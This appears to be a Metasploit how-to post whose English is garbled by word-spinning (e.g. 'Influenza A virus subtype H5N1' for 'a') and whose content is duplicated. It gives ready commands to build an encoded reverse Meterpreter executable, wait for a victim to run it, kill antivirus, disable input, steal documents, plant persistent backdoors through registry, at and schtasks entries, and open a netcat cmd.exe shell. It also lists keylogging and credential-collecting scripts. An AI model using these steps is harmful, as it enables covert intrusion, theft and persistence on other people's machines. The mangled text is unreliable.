If y'all dont know what the metasploit framework is, hence await it up. You've been missing out. In no trend is this meant to hold upwards a comprehensive guide. MSF is HUGE. Too many things tin can hold upwards done amongst it,
you could write fifteen books on it. MSF is Open Source in addition to coded inwards the Ruby language.
Get used to the 'help' option!
PAYLOADs
========
I'm gonna get-go amongst Payloads, many people know already that MSF is an exploitation framework, every bit inwards y'all can
work out vulnerabilities inwards software, in addition to run the framework to rapidly do working exploits for it.
There's hundreds of payloads that y'all tin can conduct from, hence that when y'all exploit the organisation inwards question
you tin can easily automate the execution of a payload of your selection on the machine.
I volition exhibit y'all how to plough those payloads into an actual .EXE hence it volition simply run every bit is.
Ok. Lets begin:
Fire upwards your MSF, brand certain it's updated, every bit they are constantly making amendments to this.
For backtrack i yell upwards its : cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
================================================== ===
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host, every bit nosotros are waiting for a connector from RHOST (remote host)
LPORT - self explanitory. Just brand certain y'all accept port forwarding develop on your router ofcourse.
Meterpreter - An incredibly advanced compaction which sort of simulates bash. (even on a win system) - lots of power.
You'll come across how much ability shorty.
Now y'all accept your PAYLOAD.exe
Metasploit Listener
===================
In /framework3 directory
$ ./msfconsole
(Takes a lil infinitesimal for this to load)
use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most mutual Payload to use, drive experimenting amongst others)
set LHOST 192.162.1.50 (Make certain y'all laid LHOST to your address on Network in addition to non localhost)
set LPORT 82 (Sometimes, port 80, 443 or 8080 is meliorate every bit to simply about FW's it looks less suspicious)
set ExitOnSession imitation (As presently every bit y'all teach a session, it doesn't automatically throttle inwards to it)
set AutoRunScript /killav.rb (when client connects back, in addition to meterpreter payload is uploaded, killav.rb script is uploaded in addition to executed)
exploit -j (sets exploit upwards every bit a job, practiced for shells on multiple customers)
(See to a greater extent than on scripts... downwards )
Continuation
============
When all goes well, in addition to y'all accept hitting 'exploit -j' in addition to accept waited for a client to click on the payload.exe y'all created earlier
you volition come across materials happening inwards the screen. You volition discovery it run the killab script, hence says something similar :
* Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
Ok, here's the basics:
type :
sessions -l (this lists whatever sessions nosotros accept i.e. customers. Notice the lowercase L )
sessions -i 1 (this is to interact amongst the session 1. i.e. Interect. Lowercase I)
If y'all demand to come upwards out of this screen. Either CTRL+Z or type 'background' without the ''
Ok.. So nosotros are inwards the session: Brilliant
Continuation - The Good Stuff
=============================
$ Meterpreter > getuid (this volition exhibit y'all currently logged inwards user)
$ Meterpreter > idletime (wanna come across how long user has afk?)
$ Meterpreter > attention (this volition exhibit y'all a massive listing of amzing commands to use!)
$ Meterpreter > run priv (then depository fiscal establishment represent attention again, to a greater extent than privilidged commands right away eh?
ok i volition exhibit simply about actually handy ones
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents in addition to settings" (cd's to a folder amongst spaces inwards it.)
$ Meterpreter > ls (this is an instance of the bash type commands nosotros accept on the target win machine, version of dir)
$ Meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire "My Docs" folder over to us.
$ Meterpreter > execute *f evil.exe (executed the file on the customer)
$ Meterpreter > execute *f cmd.exe *c *H *i (-f executes, cmd.exe compaction on target, channelized, hidden, interactive)
(customer volition non come across a matter your doing every bit all the options are laid properly)
Check downwards the bottom for simply about useful cmd.exe commands that are really useful
$ Meterpreter > uictl disable keyboard (disables simply about user interface componants)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this volition exhibit y'all a detailed listing of all processes running on target machine)
$ Meterpreter > migrate pid (migrates/injects itself into simply about other procedure id) e.g migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)
etc etc etc etc....
Using Payload As Influenza A virus subtype H5N1 Backdoor
===========================
upload /home/metabkdr.exe metabkdr.exe (to app information directory)
execute *-f cmd.exe *-c *-H -*i
Way 1 :
cmd.exe > REG add together HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "C:\Documents in addition to Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c get-go "C:\Documents in addition to Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(runs backdoor at 7pm all weekdays, at ascendancy works for all windows i think)
Way three :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45
/TN FIREWALL /TR "C:\Documents in addition to Settings\Owner\Application Data\Microsoft\Ins
taller\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins every bit SYSTEM (on XP. XP habitation doesnt accept schtask, has 'at' though)
Plant Influenza A virus subtype H5N1 Simple Backdoor amongst Netcat
===================================
plant a backdoor
A really elementary trend of planting backdoor could hold upwards using netcat.
steps:
1. upload a netcat executable (nc.exe) on remote machine.
meterpreter provides a ascendancy 'upload' for that
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. right away from your machine, type nc -v -n <ip address> <port>
It volition give y'all a ascendancy compaction of remote machine
nc -l -d -p fourscore -e c:\windows\system32\cmd.exe
More On Scripts:
================
Scripts tin can hold upwards run from the meterpreter compaction when y'all accept a compaction on a customer.
All y'all do is: (where '$' is non to hold upwards typed. This is the bash shell)
$ run scraper -h (This volition exhibit y'all the options etc for whatever of the scripts)
or
$ run keylogrecorder -h
The Sky is your throttle when it comes to scripts. You tin can code them to do all sorts of materials for you.
There are many already inside the the framework, made past times folk.. here's a modest listing of simply about already there:
killav.rb (kills all anti viruses running on system)
getcountermeasure.rb (kills av's in addition to fw's/ids')
scraper.rb (logs LOADS of useful information via a serious of automated commands on customer. Logs stored inwards /root/.msf3/
gettelnet.rb (able to opened upwards a telnet server on the client amongst a username in addition to password)
checkvm.rb (checks to come across if it is a VM. And version numbers)
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb
you could write fifteen books on it. MSF is Open Source in addition to coded inwards the Ruby language.
Get used to the 'help' option!
PAYLOADs
========
I'm gonna get-go amongst Payloads, many people know already that MSF is an exploitation framework, every bit inwards y'all can
work out vulnerabilities inwards software, in addition to run the framework to rapidly do working exploits for it.
There's hundreds of payloads that y'all tin can conduct from, hence that when y'all exploit the organisation inwards question
you tin can easily automate the execution of a payload of your selection on the machine.
I volition exhibit y'all how to plough those payloads into an actual .EXE hence it volition simply run every bit is.
Ok. Lets begin:
Fire upwards your MSF, brand certain it's updated, every bit they are constantly making amendments to this.
For backtrack i yell upwards its : cd pentest/exploits/framework3
Metasploit Double Encoded Reverse Meterpreter Payload
================================================== ===
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe
LHOST - is our machine (listening host, every bit nosotros are waiting for a connector from RHOST (remote host)
LPORT - self explanitory. Just brand certain y'all accept port forwarding develop on your router ofcourse.
Meterpreter - An incredibly advanced compaction which sort of simulates bash. (even on a win system) - lots of power.
You'll come across how much ability shorty.
Now y'all accept your PAYLOAD.exe
Metasploit Listener
===================
In /framework3 directory
$ ./msfconsole
(Takes a lil infinitesimal for this to load)
use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most mutual Payload to use, drive experimenting amongst others)
set LHOST 192.162.1.50 (Make certain y'all laid LHOST to your address on Network in addition to non localhost)
set LPORT 82 (Sometimes, port 80, 443 or 8080 is meliorate every bit to simply about FW's it looks less suspicious)
set ExitOnSession imitation (As presently every bit y'all teach a session, it doesn't automatically throttle inwards to it)
set AutoRunScript /killav.rb (when client connects back, in addition to meterpreter payload is uploaded, killav.rb script is uploaded in addition to executed)
exploit -j (sets exploit upwards every bit a job, practiced for shells on multiple customers)
(See to a greater extent than on scripts... downwards )
Continuation
============
When all goes well, in addition to y'all accept hitting 'exploit -j' in addition to accept waited for a client to click on the payload.exe y'all created earlier
you volition come across materials happening inwards the screen. You volition discovery it run the killab script, hence says something similar :
* Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)
Ok, here's the basics:
type :
sessions -l (this lists whatever sessions nosotros accept i.e. customers. Notice the lowercase L )
sessions -i 1 (this is to interact amongst the session 1. i.e. Interect. Lowercase I)
If y'all demand to come upwards out of this screen. Either CTRL+Z or type 'background' without the ''
Ok.. So nosotros are inwards the session: Brilliant
Continuation - The Good Stuff
=============================
$ Meterpreter > getuid (this volition exhibit y'all currently logged inwards user)
$ Meterpreter > idletime (wanna come across how long user has afk?)
$ Meterpreter > attention (this volition exhibit y'all a massive listing of amzing commands to use!)
$ Meterpreter > run priv (then depository fiscal establishment represent attention again, to a greater extent than privilidged commands right away eh?
ok i volition exhibit simply about actually handy ones
$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)
$ Meterpreter > cd "Documents in addition to settings" (cd's to a folder amongst spaces inwards it.)
$ Meterpreter > ls (this is an instance of the bash type commands nosotros accept on the target win machine, version of dir)
$ Meterpreter > download -r “My Documents” /home/root/Documents (This would download the entire "My Docs" folder over to us.
$ Meterpreter > execute *f evil.exe (executed the file on the customer)
$ Meterpreter > execute *f cmd.exe *c *H *i (-f executes, cmd.exe compaction on target, channelized, hidden, interactive)
(customer volition non come across a matter your doing every bit all the options are laid properly)
Check downwards the bottom for simply about useful cmd.exe commands that are really useful
$ Meterpreter > uictl disable keyboard (disables simply about user interface componants)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)
$ Meterpreter > ps (this volition exhibit y'all a detailed listing of all processes running on target machine)
$ Meterpreter > migrate pid (migrates/injects itself into simply about other procedure id) e.g migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)
etc etc etc etc....
Using Payload As Influenza A virus subtype H5N1 Backdoor
===========================
upload /home/metabkdr.exe metabkdr.exe (to app information directory)
execute *-f cmd.exe *-c *-H -*i
Way 1 :
cmd.exe > REG add together HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "C:\Documents in addition to Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f
(This adds a registry startup obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c get-go "C:\Documents in addition to Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"
(runs backdoor at 7pm all weekdays, at ascendancy works for all windows i think)
Way three :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45
/TN FIREWALL /TR "C:\Documents in addition to Settings\Owner\Application Data\Microsoft\Ins
taller\metabkdr.exe" /ED 11/11/2011
(This runs the backdoor every 45 mins every bit SYSTEM (on XP. XP habitation doesnt accept schtask, has 'at' though)
Plant Influenza A virus subtype H5N1 Simple Backdoor amongst Netcat
===================================
plant a backdoor
A really elementary trend of planting backdoor could hold upwards using netcat.
steps:
1. upload a netcat executable (nc.exe) on remote machine.
meterpreter provides a ascendancy 'upload' for that
2. c:\windows\system32 > nc.exe -l -L -p <port number> -e cmd.exe
3. right away from your machine, type nc -v -n <ip address> <port>
It volition give y'all a ascendancy compaction of remote machine
nc -l -d -p fourscore -e c:\windows\system32\cmd.exe
More On Scripts:
================
Scripts tin can hold upwards run from the meterpreter compaction when y'all accept a compaction on a customer.
All y'all do is: (where '$' is non to hold upwards typed. This is the bash shell)
$ run scraper -h (This volition exhibit y'all the options etc for whatever of the scripts)
or
$ run keylogrecorder -h
The Sky is your throttle when it comes to scripts. You tin can code them to do all sorts of materials for you.
There are many already inside the the framework, made past times folk.. here's a modest listing of simply about already there:
killav.rb (kills all anti viruses running on system)
getcountermeasure.rb (kills av's in addition to fw's/ids')
scraper.rb (logs LOADS of useful information via a serious of automated commands on customer. Logs stored inwards /root/.msf3/
gettelnet.rb (able to opened upwards a telnet server on the client amongst a username in addition to password)
checkvm.rb (checks to come across if it is a VM. And version numbers)
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb
